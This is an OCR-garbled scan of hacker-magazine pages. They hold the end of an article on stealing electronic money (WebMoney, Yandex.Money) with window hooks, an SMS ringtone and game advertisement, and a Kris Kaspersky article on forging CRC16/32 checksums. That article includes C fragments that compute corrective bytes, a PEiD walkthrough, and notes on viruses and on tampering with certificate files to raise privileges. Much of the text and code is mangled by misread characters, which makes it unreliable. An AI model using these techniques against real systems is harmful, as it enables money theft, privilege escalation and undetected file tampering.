Используя такую схему, злобный хакер смо- 
жет похищать электронные деньги не только 
с ѴѴеЬМопеу, но и с любых других систем: 
Е-ОоІсІ, Яндекс.деньги и т.д. 

Конечно же, я никоим образом не призываю 
всех этим заниматься! Это очень низко и 
гадко! Это не хакерство, а настоящее кибер- 
падонство! Автор и редакция не собираются 
нести никакой ответственности за исполь- 
зование данной статьи в ваших грязных 
целях! 

Если у тебя есть какие-нибудь интересные 
идеи, замечания, предложения — можешь 
поделиться ими со мной, зс 



3 

На РУР лежат исходники хука на отлов 
окон и хук на скрытие от СігІ-АІі-РеІ , а также 
код распознавания цифр. Для работы с 
ними тѳбѳ понадобится компилятор РѳІрНі. 



3 

Про ѴѴіпАРІ можно почитать тут: 
НПр://ѵѵіпарі.Ьѵ.ги/ 
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Полифония 



При загрузке любого типа мо- 
бильного контента вы получаете ссыл- 
ку на Лаѵа-приложение ЛоІІу.ги». Теперь 
для выбора и заказа мобильной начинки 
не нужно каждый раз вводить код покупки 
(например, игры или мелодии) и отправ- 
лять его при помощи зтз, достаточно кла- 
виш навигации мобильного телефона! 



Картинки 



Тотаз М’еѵегдгееп - Зіпсе уои’ѵе Ьееп допе 
Лизйп ТітЬегІаке - Сгу те а гіѵег 
Сеогде МісИаеІ - Лезиз Іо а сіііісі 
Ріеку Маіііп - Шт Іа ѵісіа Іоса 
ЗидаЬаЬез - Ноіе іп №е ИеасІ 
Мг. Ргезісіеп* - Сосо іатЬо 
Асе о! Ьазе - Нарру паііоп 



Мировые хиты 

47122744 К-Маго-Сгагу 
46571744 Л-Ріѵе -РіпсІ ашу 
491 1 0744 Раіп - 5Ии1 уоиг тоиШ 
49357744 Лепііег Ьорег - ОеІгідМ 
49359744 Сооііо - Сапдзіа’з Рагасіізе 
49361744 Сгаід ОаѵісЗ - ѴѴаІкіпд аѵѵау 
49362744 Веуопсе & Зау 1 - Сгагу іп Іоѵе 

Наши хиты 

49288744 Каста - Сестра Валерий Меладзе и ВИА ГРА - Притяженья больше нет 
49286744 Массква - 7 этаж Леонид Агутин и Отпетые Мошенники- Граница 

Н. Басков и Т. Повалий - Отпусти меня 
Ночные Снайперы - Катастрофически 
Сливки - Куда уходит детство 
Тема из к/ф Операция Ы Рынок 
Гости из будущего - Ты где-то 
Блестящие - За четыре моря 
Жанна Фриске-Лалала 
ОЛ Грув - Служебный роман 
Ііта2гтаН- Ума Турман 
Дискотека Авария - Небо 



47176744 Земфира - Искала 
49224744 Банда - Плачут небеса 
49228744 І.А.Т.и. -Люди инвалиды 
49227744 Ирина Дубцова - 0 нем 
49346744 Тутси - Горький шоколад 
49345744 Шпильки - Сам ты Наташа 
49363744 Елка - Хорошее настроение 
47312744 Мультфильмы - За нами следят 
49279744 Кристина Орбакайте - Все сначала 
48553744 Дима Билан - Я так люблю тебя (ремикс) 



48836744 Анжелика Варум - Художник, что рисует дождь Серега - Король ринга 




Игры 




ФРАНКЕНШТЕЙН 
Попробуй стать получеловеком, по- 
лумонстром. На тебя будет объявле- 
на настоящая охота. Помимо самого 
доктора, тебя будут преследовать 
и жители замка. Для выхода нужен 
ключ, до которого еще надо дойти. 
Надеюсь, в этом тебе помогут элек- 
сиры, забытые доктором. 

ЕХСНЕМАМ 

Вонючий, грязный и вечно отрыгива- 
ющий Супер герой путешествует по 
миру Канализации, кишащей гряз- 
ными и опасными тварями.Сражаясь 
с полчищами Фикалоидов, вы може- 
те использовать множество прико- 
лов - например, телепортацию пу- 
тем смывания себя в унитаз 



12320744 


11709744 


11733744 


12075744 



СиШІАТОНЗ 

Вы - древнеримский гладиатор. По- 
беда или смерть - иного не дано. 
Пройдя все круги ада, Вы получи- 
те достойную награду - свободу! Но 
помните - ваши соперники воору- 
жены и очень опасны! Различное во- 
оружение и типы ударов не позволят 
Вам заскучать. 

ОПШК&ОШѴЕ 

Постарайтесь добраться домой из 
бара, но будьте внимательны - у вас 
“двоится” в глазах! Почувствуйте, 
почему же Вас отговаривают от вож- 
дения в нетрезвом виде. Особенно, 
если это - совершенно новый авто- 
мобиль вашего папы. 



51163744 

51173744 

49177744 

49184744 

48248744 

47982744 

46421744 

48784744 

48521744 

48060744 



Бой курантов 
Сигнализация 
Мистический звук 
Открывание бутылок 
Фигня бывает разная... 
Индеец (идиотский клич) 
Кросавчег, бири трубку! 
Кнопка самоуничтожения... 
Дорогая, возьми меня в руки.. 
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Реадтоны 



Дай папиросочку. . .к.ф. Собачье Сердце 5 1 1 06744 
Я не телефон, я - луноход или шатл . . . 48057744 
Внимание, вам звонят с того света. 48067744 
Подъем , негр! Солнце уже высоко! 48037744 
Такая загогулина! (пар. Ельцин) 46371744 
Ну вот че, че ты меня лапаешь? 48099744 
Рота, подъееем!!! (сирена - тіх) 47028744 
Встать! Притвориться трезвым! 47569744 
Смс, ржунимагу, ваще... 48777744 
Смс зачет! Дайте две 48789744 



Анимация 




ТНЕ ОАѴШСІ СОВЕ 
Помоги Роберту Ленгдону и 
Софи Неве разгадать тайны 
прошлого в часовне на севере 
Шотландии. Используя зеркала 
и призмы, нужно управлять све- 
том в окнах часовни и разгады- 
вать секретные сообщения, за- 
шифрованные в камнях. 





А5ТЕПІХ 

Теперь Астерикс может быть 
всегда рядом с вами - в вашем 
мобильном телефоне! Новый 
хит сохранил настроение филь- 
ма, и вы сможете проникнуть в 
волшебные леса древней Анг- 
лии, воспользоваться колдов- 
ским зельем друидов и навес- 
ти полный порядок в римском 
лагере! 



МРЗ 



Мировые хиты 

46540744 Аѵепіига - ОЬзезіоп 
46545744 Л-Ріѵе - Ріші АѴѴау 
48114744 Іп-СгісІ - І’ш РоІІе ВеТоі 
48665744 ѴѴНідІіеМ - Іа$1 сЬгізІтаз 
46549744 О-гопе- Огадозіеа сііп Іеі 

Наши хиты 

49259744 Каста - Сестра 
49378744 Токио - Если да 
49374744 Ума2рман - Кино 
49292744 Ума2рман - Скажи 
49379744 Токио - Кто я без тебя 
47441744 Ні Рі - Глупые люди 
49260744 03 Грув - Служебный роман 
48674744 Многоточие - Сквозь печаль 
49257744 Валерий Меладзе - Салют, Вера! 
49255744 Подъем и Карина - Белые кораблики 
47439744 Тгіріех ѵз Аросаіірііса - Бой с тенью 
49254744 Кристина Орбакайте - Перелетная птица 
4922 1 744 Смысловые галлюцинации - Полюса 
48818744 Чугунный Скороход - Реалити - Шоу 
48430744 Ѵепдегоѵ & РесІогоИ - Кавказская пленница 



Еѵегу Зіпдіе Оау 
Меіапіе С - Мехі Ьезі зирегзіаг 
СІоЬаІ Оефуз - а іееііпд 
Атзепіиш - Іоѵе Ме..1оѵе Ме... 
Рарі ЗапсИег - Епатогате 

Ленинград - Тема дороги( из к/ф Бумер 2) 
Юлия Савичева - Прости за любовь 
Дискотека Авария - Суровый рэп 
Жанна Фриске - Где-то летом 
Ирина Дубцова -0 нем 
Елка - Девочка в Пежо 
Братья Гримм - Кустурица 
А Студио- Улетаю 
Фактор 2 - Шалава 
Звери - Для тебя 
Глюк’:)га- Москва 
Серёга - Кіпд гіпд 
НікоТіп - Щекотка 
Массква - Ну наконец-то 
Би 2- Фламенко 




48726744 

47363744 

46543744 

46578744 

46550744 

49123744 

48631744 

49261744 

49243744 

49269744 

48737744 

48692744 

49291744 

48760744 

49238744 

49251744 

46557744 

48494744 

49253744 

49219744 



для телефонов Иокіа, Зіешепз, Зопу-Егісззоп 



Звери - Рома, извини! 0та2гтаН - Кино 



Шпаргалки 3130 Книги 
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12576744 Русский язык 
12577744 Физика 
12571744 Геометрия 
12572744 Истоия россии 
12573744 Литература 
12574744 Математика 
1 2575744 Обществознание 



Проверь совместимость своего телефона и объекта на 
ѵѵар.іоііу.ги/сосіе. 

Отправь 5М5 с кодом цветной картинки, анимации, 
реалтона или мелодии на номер 3120, игры на номер 
3130 или 1230, шпаргалки, книги, темы или видео на 
номер 3130 

Стоимость ЗМ5: для 3120 - 29,7 руб.; для 3130 - 60 
руб.; для 1230 - 120 руб. без НДС. 

При загрузке любого типа мобильного контента вы бес- 
платно получаете ссылку на Лаѵа-приложение «ЛоІІу.ги» 




ЧЕРНОВИК 

В твоей квартире живут чужие люди... Твое 
место на работе занято другим. „Тебя не уз- 
нают ни друзья, ни любимая девушка... Тебя 
стирают из этого мира. Кто? Почему? Как? Вы 
узнаете об этом из нового романа Сергея Лу- 
кьяненко ... 

80198744 часть 1 80321744 часть 2 



Точную рублевую стоимость уточняй у оператора. 
Скидка до 50% при оплате картой “Евросеть-контент” 
по телефону 8 (495) 980-44-87, на сайтах ѵѵар.іоііу.ги, 
ѵѵѵѵѵѵ.іоііу.ги, терминалах мобильного контента 
Внимание! Требуется настройка ѴѴАР/СРН5. 

В случае ошибочного запроса услуга считается 
оказанной! 

Служба поддержки: 8 (495) 786-65 -87. 

Операторы: МТС, Билайн, Мегафон, СМАРТС (Самара, 
Астрахань, Волгоград), МОТИВ, НСС. 















КРИС КАСПЕРСКИ 



СосІіпд/ с/с++ 



ИЗМЕНЯЕМ ЗАПРЕТНЕЕ 





АЛГОРИТМ ХЭШИРОВАНИЯ СРС1 6/32 СЧИТАЕТСЯ 
НЕСОКРУШИМЫМ, И НИКТО НЕ МОЖЕТ ВОССТАНО- 
ВИТЬ ОРИГИНАЛЬНОЕ СОДЕРЖАНИЕ ПО КОНТРОЛЬ- 
НОЙ СУММЕ. НО МОДИФИЦИРОВАТЬ ФАЙЛ ТАК, 
ЧТОБЫ ЕГО СРС1 6/32 НЕ ИЗМЕНИЛОСЬ — ПРОЩЕ 
ПРОСТОГО. ВОТ ОБ ЭТОМ МЫ И БУДЕМ ГОВОРИТЬ. 



Алгоритм СНС16/32 изначально предназначался для контроля целостности данных от 
непреднамеренных искажений. Он широко используется в проводных и беспроводных сетях, 
магнитных и оптических носителях, а также микросхемах постоянной или перешиваемой 
памяти. «Надежность» СНС32 оценивается как 2 Л 32 == 4.294.967.296, то есть вероятность, 
что контрольная сумма искаженного файла волшебным образом совпадет с оригиналом, оце- 
нивается (в среднем) как один против четырех миллиардов раз. Отсюда следует, что, передав 
восемь миллиардов пакетов через сильно зашумленный канал, мы рискуем получить пару 
«битых» пакетов, чьи искажения останутся необнаруженными. Но ведь в действительности 
все совсем не так! Природа большинства физических помех и дефектов носит групповой 
характер, с которым СНС32 легко справляется и в реальной жизни. Никакие искажения от 
СНС32 не ускользают! 

Но вот алгоритм СНС32 просочился в массы. Программисты стали применять хэширование 
в зашитых механизмах, призванных обеспечить информационную безопасность и проти- 
востоять предумышленным искажениям. Другими словами — защитить от хакерских атак. 
Машинный код, контролирующий свою целостность через СРС, не очень-то полезен, пос- 
кольку контрольная сумма хранится непосредственно в теле программы. Модифицировав 
программу, хакер рассчитывает новое значение контрольной суммы, корректирует поле СПС 
(а найти его в отладчике/дизассемблере — совсем не проблема), и защитный механизм про- 
должает считать, что в «Багдаде все спокойно». 

Скажу откровенно: наличие механизмов самоконтроля серьезно раздражает хакеров и пре- 
пятствует пошаговой трассировке зІер-Ьу-зІер, при которой отладчик внедряет ОСИ после 
каждой команды. Однако хакера лучше не злить. Размахивая зой-ісе, словно топором, и 
прикрываясь дизассемблером, как щитом, он находит и поле контрольной суммы, и тот код, 
который ее контролирует, после чего обоим настает конец. 

Кстати говоря, «правильная» контрольная сумма должна быть равна нулю. Это — закон! 
Именно так работает механизм самоконтроля ВІОЗ’ов. В этом случае контрольная сумма 
нигде не хранится, но к содержимому прошивки добавляются четыре байта (в СПС16 — два 
байта), рассчитанных так, чтобы контрольная сумма всего контролируемого блока обраща- 
лась в ноль. В этом случае ломать защиту становится намного труднее (ведь поля контрольной 
суммы нет!), но все-таки возможно. Достаточно установить аппаратную точку останова на 
модифицированную команду (в зой-ісе это делается так: «Ьрт абсіегз П»), и отладчик приве- 
дет нас к коду, который вычисляет контрольную сумму и на каком-то этапе выносит заключе- 
ние: СПС ОК или СПС не ОК. 

Обычно хакеры «отламывают» непосредственно сам проверяющий механизм, чтобы про- 
грамма работала независимо от того, какой у нее СПС, однако этот способ срабатывает не 
везде и не всегда. Вспомним спор, возникший в конференции ЗІІ.ѴІНІІЗ по поводу инспектора 
Асііпіо: может ли вирус заразить файл так, чтобы его контрольная сумма осталась неизмен- 
ной? Может! Даже если весь файл проверяется целиком — от ушей до хвоста! Чуть позже мы 
покажем, как это сделать, а сейчас рассмотрим другой случай: клиент серверной системы, в 
которой ключевой файл (условно называемый «сертификатом») находится у клиента, а его 
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название 

СПС-16 


разрядность, 

бит 

16 


роіу 

80051т 


іпіі 

00001т 


отрах 

іпіі 

да 


<ение 

ои! 

да 


хогои * Параметры подсчета 

СПС, используемые в 
0000И различных алгоритма 


СПС-1 6/СІТТ 


16 


1 021 Іт 


РРРРГі 


нет 


нет 


00001т 


ХМОйЕМ 


16 


84081т 


00001т 


да 


да 


> 

00001т 


АПС 


16 


80051т 


00001т 


Да 


Да 


00001т 


СПС-32 


32 


04С1ЮВ7Н 


РРРРРРРРІі 


Да 


Да 


РРРРРРРРН 


СПС-64 


64 


60034000Р050ВІ1 


РАС432В1 0СР5Е44АІ1 


да 


да 


РРРРРРРРРРРРРРРРІі 



контрольная сумма хранится и проверяется на сервере. В состав 
сертификата может входить все, что угодно: название организации, 
ІР-адрес клиента, его «рейтинг», уровень «полномочий» в системе и 
т. д. и т. п. Весьма распространенный подход, не правда ли? Чтобы 
повысить уровень своих полномочий, клиент должен модифици- 
ровать файл сертификата, что с неизбежностью влечет за собой 
изменение контрольной суммы, скрупулезно проверяемой сервером, 
взломать который значительно сложнее, чем подправить пару байт 
в Ыеѵѵ’е! 

Защиты подобного типа растут, как грибы. Вот хорошая статья на эту 
тему «Тайна золотого ключика, или особенности системы лицензион- 
ных ключей, используемой компанией ЗоЙѵѵаге АО»: ИНр://ѵѵѵѵѵѵ.ѵѵазт. 
ги/аг1ісІе.рНр?аг1ісІе=5ааІіскеѵ) . разработчики которых свято верят в 
СНС32, забыв о том, что он страхует только от ненамеренных иска- 
жений, то есть искажений, которые происходят случайно и затрагива- 
ют один или несколько хаотичным образом разбросанных байт. 
Информационная стойкость СНС32 равна 4-м байтам, и от этого 
никуда не уйти. Именно столько байт требуется внедрить в модифи- 
цированный файл (или дописать их к нему), чтобы его контрольная 
сумма полностью сохранилась независимо оттого, сколько байт было 
изменено! Естественно, эти четыре корректирующих байта должны 
быть рассчитаны по специальному алгоритму, но это потребует 
совсем немного времени (в смысле — вычислительных ресурсов). 
Самое интересное, что методики «подделки» СПС широко известны 
и описаны во множестве руководств, а у популярной утилиты РЕЮ 
даже имеется плагин, специально предназначенный для этой цели! 

Теоретические основы СПС32 

Прежде чем ломать СНС32, необходимо научиться его считывать. Из 
всех учебников и статей мне больше всего нравится «а раіпіезз диісіе 
Іо сгс еггог беіесйоп аІдогШітз», которое я настоятельно рекомендую 
для изучения. Имеется также и русскоязычный перевод. Адреса 
обоих можно найти во врезке по ссылкам. Кстати говоря, в последнее 
время набирает силу СНС64, который рассчитывается аналогичным 
образом, но, естественно, другим полиномом. Кое-где используется 
даже СНС128, но пока он не стандартизован, а поэтому здесь не 
затрагивается. 

Аббревиатура СРС расшифровывается как Сусііс Ребипсіапсу СНеск 
(проверка избыточности циклической суммы) и стягивает под свою 
крышу целую кучу самых разных алгоритмов, разработанных в 
«геральдические» времена с ориентацией на воплощение в «железо». 
В практическом плане это означает, что большинство СРС-алгорит- 
мов представляют собой тривиальный подсчет контрольной суммы в 
стиле «Ьг(а=0,СРС=ІМТ_ѴАШЕ;а < Іеп;а++) СНС+=ОАТА[а];», лишь с 
той оговоркой, что сложение выполняется не алгебраическим путем, 
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а происходит в полях Галуа, в тесном сотрудничестве с полиноми- 
альной арифметикой. В «железе» все это хозяйство реализуется на 
сдвиговых регистрах и логических вентилях, что очень дешево стоит 
и еще быстрее работает. 

Программная «эмуляция» СПС на ІВМ РС мягко говоря... неоправ- 
данна. Приходится прибегать к табличным алгоритмам или сложным 
математическим преобразованиям, но первое требует памяти, вто- 
рое — процессорного времени, и в конечном счете мы раздуваем 
муху до размеров слона. Почему же тогда СПС пользуется такой 
популярностью? Его можно найти в гір, аф различных защитных 
механизмах. Такое впечатление, что кому-то некуда девать свои 
курсовые работы, и кто-то просто использует готовые библиотеки, 
пропуская теорию кодирования мимо ушей. Зачем она ему? Ведь 
все и так работает! 

Но это все лирика. Вернемся к нашим баранам. Никакого единого 
стандарта на СПС не было и нет. Даже когда говорят о СПС16 или 
СПС32, то подразумевают всего лишь разрядность контрольной 
суммы, для вычисления которой необходимо знать два фундамен- 
тальных параметра: полином (роіу) и начальное значение контроль- 
ной суммы (іпіф. 

Параметр геііесйоп указывает на то, используется ли зеркальное 
битовое отражение или нет. Отражаться могут как входные, так и 
выходные данные. Если байт отражен, то нумерация в нем ведется 
слева направо, то есть наименее значимый бит располагается по 
меньшему адресу (как, например, на х86), и, соответственно, наобо- 
рот. Наиболее быстрыми будут те алгоритмы, которые соответствуют 
выбранной «железной» архитектуре. В противном случае приходится 
прибегать к довольно дорогостоящей, в плане процессорных ресур- 
сов, эмуляции. 

Параметр ХогОиІ — это то значение, которым ХОП’ится рассчитан- 
ная контрольная сумма. Обычно она равна 0 или -1 (то есть РРРРН 
для СПС16 и РРРРРРРРИ для СПС32). 

Различные схемы (программы, защитные механизмы, аппаратные 
устройства) используют различные параметры подсчета контрольной 
суммы, отсутствие информации о которых существенно затрудняет 
взлом, поэтому ниже приводятся данные об основных алгоритмах, 
которые мне удалось только открыть. 

Постой! Но ведь «стандартный» полином для СПС32 равен 
ЕОВ88320Ф а совсем не 4С1ЮВ7І1. Это каждый студент знает! Все 
правильно, никакого противоречия здесь нет, закрой забрало и не 
высаживайся! Число ЕОВ88320Н представляет собой зеркально 
отраженный полином 4С1ЮВ7Ф в соответствии со словом «да» в 
колонке «отражение» (см. таблицу). Давай переведем его в битовый 
вид и посмотрим, что получится. А получится у нас вот что: 

Стандартный СВС-32 полином и его общепринятая отображенная версия 
04С1 1 0В7И: 000001 001 1 000001 0001 110110110111 
ЕОВ88320Н: 1110110110111 0001 000001 1 001 00000 

Готовую процедуру расчета СПС приводить не будем, поскольку ее 
можно найти в любой книжке и в ссылках, приведенных ниже. Как 
уже говорилось, ее программная эмуляция на ІВМ РС не наглядна. 

В общих чертах идея «взлома» СПС заключается в добавлении 
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Вызов плагина СНС32 
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к контролируемому блоку нескольких 
байт, подгоняющих конечную конт- 
рольную сумму под прежнее значение. 

Количество корректирующих равно раз- 
рядности контрольной суммы, то есть 
СРС1 6 требует двух, СРС32 — четырех, 
а СВ-64 — восьми байт, рассчитан- 
ных специальным образом или полу- 
ченных методом перебора (см. врезку 
«Неизвестные алгоритмы и борьба с 
ними»). 

Как же их рассчитать? Помимо исполь- 
зуемого алгоритма (включая такие интим- 
ные подробности, как значение полинома, 
начальное значение и хог-оій), необходимо 

знать, откуда и докуда защита считает контрольную сумму. Выяснив 
это, необходимо решить другой, гораздо более щекотливый вопрос: 
собираемся ли мы внедрять корректирующие байты внутрь контроли- 
руемого блока или ограничимся их дописыванием? Если защитный 
механизм проверяет целостность всего блока, то лучше и проще 
всего будет дописать, как это подробно описано в руководстве «СВС 
апсі Ноѵѵ іо Реѵегзе іі», с приложенными к нему исходными текстами. 
Однако длина контролируемого блока (в роли которого чаще всего 
выступает исполняемый файл) в этом случае заметно изменится! 
К тому же многие защитные механизмы контролируют целостность 
фиксированного участка, и хоть дописывай байты, хоть не дописы- 
вай — защита не обратит на них никакого внимания, и СВС контроли- 
руемого блока после его модификации необратимо изменится! 

Ниже приведен фрагмент исходного кода плагина «СВС» к утили- 
те РЕЮ, которая как раз и дописывает 4 корректирующих байта к 
модифицированному файлу. Пользуйся им на здоровье, только не 
спрашивай, где взял ;). 

Код от ВЕІГа для нахождения корректирующих байт 
#іпсІисІе<зІбіо.Іі> 

ипзідпесі Іопд с,с2,р2,роІ=0хЕОВ88320; 

Іопд п,к; 
таіп() 

{ 

ргіпЩ«СВС32 Афзіег (с) 2001 Ьу ВЕІі @ ННТ/2\п»); 
ргіпіі(«І_епд1:ІпоісІа1:а: «); зсапі(«%ІсІ»,&п); 
ргіпЩ«ШзеіІо раісП: «); зсапі(«%ІсІ»,&к); 
п = (п-к)«3; 

ргіпіі(«СиггепіСРС32: Ох»); зсапі(«%х»,&с); 
ргіпЩ«Оезігеб СНС32: Ох»); зсапі(«%х»,&с2); 
с л = с2; 
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р2 = (роі « 1)11; 

ѵѵЬІІе(п-) іі (с&0х80000000) с = (с«1 ) л р2; ѳізе с«=1 ; 
ргіпіі(«ХОВ тазкз:%02Х%02Х%02Х%02Х\п»,с&0хіі,(с»8)&0хіі,(с»1 6)&0хіі, 
с»24); 



Методика внедрения байтов внутрь контролируемого блока более 
перспективна. Если это машинный код (где нужно исправить один 
условный переход на другой), нам наверняка удастся переписать 
несколько машинных команд так, чтобы высвободить место для 4-х 
байт, не говоря уже о том, что компиляторы всюду вставляют ІЧОР’ы 
для выравнивания. Если же это ключевой файл типа сертификата, 
что ж. . . втиснуться туда еще проще (хотя бы оттяпать от своего имени 
четыре символа, при условии, что там содержится имя). 

Рассмотрим практический пример подделки СРС32 с ШІе-епсІіап 
порядком бит в потоке (наименее значимый бит располагается по 
меньшему адресу, то есть поток движется справа налево). Остальные 
алгоритмы взламываются аналогичным образом, с поправкой на спе- 
цифику разрядности и направления потока. 

Возьмем последовательность байтов конт- 

рольная сумма которой известна и равна СВС_ОК, модифицируем ее 
некоторым образом, изменив один или несколько произвольно распо- 
ложенных байтов (они обозначены символом «х»): «А::: ::х:::: ::::::: :::::::: 
:::::::ххх::::х:хЮ». После этого контрольная сумма модифицированной 
последовательности будет СРС_І\ЮТ_ОК, а это плохо. 

Подделка СРС начинается с выбора позиции «врезки» 4-х корректи- 
рующих байт. С точки зрения алгоритма СРС, их положение непри- 
нципиально — оно определяется внутренней структурой модифици- 
руемого блока. Для наглядности разместим корректирующие байты в 
середине: «А:::::х::::::В_12_3_4_С:::::::ххх:::х:хЮ». 

Остается только рассчитать корректирующие байты _1_2_3_4_ и 
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Для «подделки» контрольной суммы РЕЮ допи- 
сывает в конец файла 4 байта 



РЕЮ скорректировал СРС модифицированно- 
го файла так, чтобы никто не заметил подмены 



тт 



восстановить (в смысле «подделать») СПС. 
Будем действовать по шагам. 

1 . В точке «А» СВС равно начальному зна- 
чению полинома (для СВС32 с отраженным 
полиномом ЕОВ88320И — это РРРРРРРРф. В 
точке «О» оно известно из условия задачи и 
равно СВС_ОК; 

2 . Если участок «А-В» не пуст — считаем 
СВС от точки «А» до точки «В», используя 
обычную процедуру ирсІаІе_СНС32(): 

ирсІаІе_СВС32(ипзідпесІ Іопд сгс, ипзідпесі сМагЫ) 

{ 

геіип сгс32погпаІ[(ип5ідпесІ сЬаг)сгс Л Ы] л (сгс » 8); 

} 



Не: РгѴіи*Лэте'(Ре!Й|ЮТЕРАБ.ЕХЕ 



ЕгКгдоте: 0000&420 
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3. Если участок «СЮ» не пуст — считаем СВС 

от точки «С» до точки «О», используя инверсную процедуру геѵегзе_ 
сгс32(): 

// (с)ОтіІгу Тотазііроізкі 

геѵегзе_сгс32(ипзідпесІ Іопд сгс, ипзідпесі сІіагЬуІе) 

{ 

геіигп ((сгс«8) л сгс32іпѵ[( пзідпесі сІіаг)(сгс»24)] л (Ьуіе)); 

} 

4 . Двигаясь в обратном направлении отточки «С» к точке «В», вычис- 
ляем элементы СВС-таблицы, преобразующие СВС(С) в СВС(В), и 
запоминаем индексы этих элементов в массиве і: 

// (с)ОтіІгу Тотазііроізкі 
к = 4; 

у = СВС_0; 

((і[— к] = зг(сгс32сііг, у, ОхРРООООООиІ)) < 0) доіо егг; 

I = сгс32сІіг[і[к]]; у = (у л 1)«8 1 і[к]; 

((і[— к] = зг(сгс32сііг, у, ОхРРООООООиІ)) < 0) оіо егг; 

I = сгс32сІіг[і[к]]; у = (у л 1)«8 1 і[к]; 

((і[— к] = зг(сгс32сііг, у, ОхРРООООООиІ)) < 0) оіо егг; 

I = сгс32сІіг[і[к]]; у = (у л 1)«8 1 і[к]; 

((і[— к] = зг(сгс32сііг, у, ОхРРООООООиІ)) < 0) оіо егг; 

I = сгс32сІіг[і[к]]; у = (у л 1)«8 1 і[к]; 

5 . Двигаясь в прямом направлении от точки «В» к точке «С» по 
индексам, рассчитанным на шаге 4, вычисляем корректирующие 
байты _1_2_3_4_ и записываем их в массив х. 

// (с)йтіігу Тотазііроізкі 



у = СВС_В; 

х[к] = ( )у Л і[к]; 

2 = сгс321(г, х[к]); к++; 
у = г;х[к] = ( ізідпес )у л і[к]; 

2 = сгс321(г, х[к]); к++; 
у = 2 ;х[к] = ( ізідпесі сіпаг) у л і[к]; 

2 = сгс 321(2, х[к]); к++; 
у = 2 ;х[к] = ( ізідпесі сііаг) у л і[к]; 

2 = сгс 321(2, х[к]); к++; 

Остается только переместить массив х на отрезок «В-С», удосто- 
вериться, что контрольная сумма блока не изменилась, и бежать в 
ближайший ларек за свежим пивом. 

Все необходимые для взлома листинги приводятся ниже. Обрати 
внимание на копирайт. За исключением первого и третьего из них, 
автор не имеет к ним никакого отношения! 

От теории к практике 

Прежде чем разрабатывать собственный взломщик СНС32, попро- 
буем повозиться с уже существующим. Скачаем популярный распоз- 
наватель упаковщиков РЕЮ, установим набор дополнительных пла- 
гинов (ѵѵѵѵѵѵ.ѵѵа5т.ги/ЬаіхасІо.рИр?тосІе=ІооІ&ісІ=31 8). в число которых 
входит и модуль с РіхСНС (в аннотации на ѴѴАЗМ’е сказано, что он 
предназначен для исправления поля СИескЗит в РЕ-заголовке, но 
это не так!). 

Запускаем РЕЮ и загружаем в него какое-нибудь приложение, напри- 
мер общепринятый поіерасі.ехе ака «блокнот». Давим на кнопку со 
стрелочкой «->», в правом нижнем углу. На экране появляется меню 
«РІидіпз», из которого мы выбираем пункт «СРС32». Возникает сим- 
патичное диалоговое окошко, сообщающее нам контрольную сумму 
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всего файла (у меня она равна АРВР6001 И). Записываем ее 
на бумажке или запоминаем. 

Выходим из РЕЮ и правим файл в Иіеѵѵ’е или в любом дру- 
гом Нех-редакторе, который тебе больше всего нравится. 
Модифицированный файл вновь загружаем в РЕЮ и 
рассчитываем новую контрольную сумму, которая теперь 
равна А9734305И. АРВР6001Н != А9734305Н, что не есть 
хорошо. Заносим в поле ЫеѵѵСНС старую контрольную 
сумму оригинального файла (АРВР6001И) и жмем кнопку 
«Ріх К». Плагин сообщает, что «4 Ьуіез ѵѵгіДеп», и действи- 
тельно дописывает к концу файла какую-то гадость. 

Зато контрольная сумма файла вновь равна АРВР6001И, 
какой она и была до модификации. Правда, длина файла 
изменилась. К тому же с защитами, следящими за кон- 
трольной суммой «от сих до сих», такой трюк уже не 
прокатывает, поэтому приходится хитрить. 

РЕЮ скорректировал СРС модифицированного файла 
так, чтобы никто не заметил подмены. 

Берем оригинальный поіерасі.ехе, привычным действием 
вычисляем контрольную сумму, затем отрезаем от его 
хвоста 4 байта (в Иіеѵѵ’е это делается так: загружаем 
файл, для перехода в Нех-тобе нажимаем <ЕЫТЕР>, 
перемещаемся в конец файла по <СігІ-ЕпсІ>, отступаем 
курсором на четыре байта назад, давим <РЗ> для пере- 
хода в режим редактирования и говорим <Р10> (Ігипсаіе), 
подтверждая всю серьезность своих намерений клави- 
шей «У»), Модифицируем файл по своему усмотрению и 
Ііх’им его в РЕЮ. Как легко догадаться, корректирующие 
байты будут дописаны на место отрезанных. Ни длина, ни 
контрольная сумма файла теперь не изменится! 
Аналогичным образом можно корректировать отдельные 
блоки, если предварительно вырезать их из программы 
и сохранить в отдельном файле. А после модификации и 
исправления СПС вновь вернуть туда, где они лежали. 

Не от хакеров... 

Алгоритм СПС1 6/32/64/1 28 страхует только от непредна- 
меренных искажений, но для защиты от хакеров он непри- 
годен. Используйте ІѴЮ5 и другие, более продвинутые 
криптографические алгоритмы (кстати говоря, по произ- 
водительности ІѴЮ5 вполне сопоставим с СПС32, и слухи 
о его «неповоротливости» слишком преувеличены). 
Конечно, при желании можно подделать и ІѴЮ5, однако 
для этого потребуются глубокие знания в области крип- 
тографии и нехилые вычислительные мощности, которых 
в распоряжении хакера, скорее всего, не окажется! дс 
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ѵѵѵѵѵѵ.опетЬесІсІіпд. 
сот/іпіо/сгс/сгс гиз. 
гір-охренительное 
руководство по 
устройству и реа- 
лизации различных 
СПС-алгоритмов на 
русском языке. 



КАК ЭТО БЫЛО 

Подделкой СПС я заинтересовался совершенно 
случайно. Все началось с экспериментов над инте- 
ловскими биосами, формат прошивок которых был 
неизвестен, и всякая попытка модификации приводила 
к краху. Найти место хранения СПС никак не удава- 
лось. Границы контролируемого блока были также 
неизвестны. Казалось, что дело труба, но, используя 
тот факт, что в прошивке хранится не само СПС, а 
«корректирующие» байты, обращающие контрольную 
сумму в ноль, а все структуры выровнены на границе 
4-х килобайт, я решил действовать так: выбираем блок, 
считаем его СПС (алгоритм подсчета был выдран из 
прожигающей программы, и был тут же опознан как 
стандартный). Если не ноль, то движемся дальше до 
тех пор, пока контрольная сумма выбранного блока не 
обратится в ноль. 

Достижение нуля сигнализирует о том, что границы 
контролируемого блока с той или иной степенью веро- 
ятности уже найдены. Модифицируем ВІ05 по своему 
желанию, после чего добавляем «корректирующие» 
байты так, чтобы контрольная сумма не изменялась, 
то есть осталась равной нулю! 

Таким образом, чтобы «взломать» СПС, помимо алго- 
ритма расчета, еще необходимо знать, откуда и доку- 
да его считать! В противном случае попытка подделки 
контрольной суммы будет немедленно разоблачена. 




ѵ НЕИЗВЕСТНЫЕ АЛГОРИТМЫ 

И БОРЬБА С НИМИ 

Хорошо, если алгоритм подсчета контрольной 
суммы известен. Но что делать, если он не доступен 
(воплощен в «железе», находится на удаленном сер- 
вере и т. д.)? А вот что: воспользоваться тупым пере- 
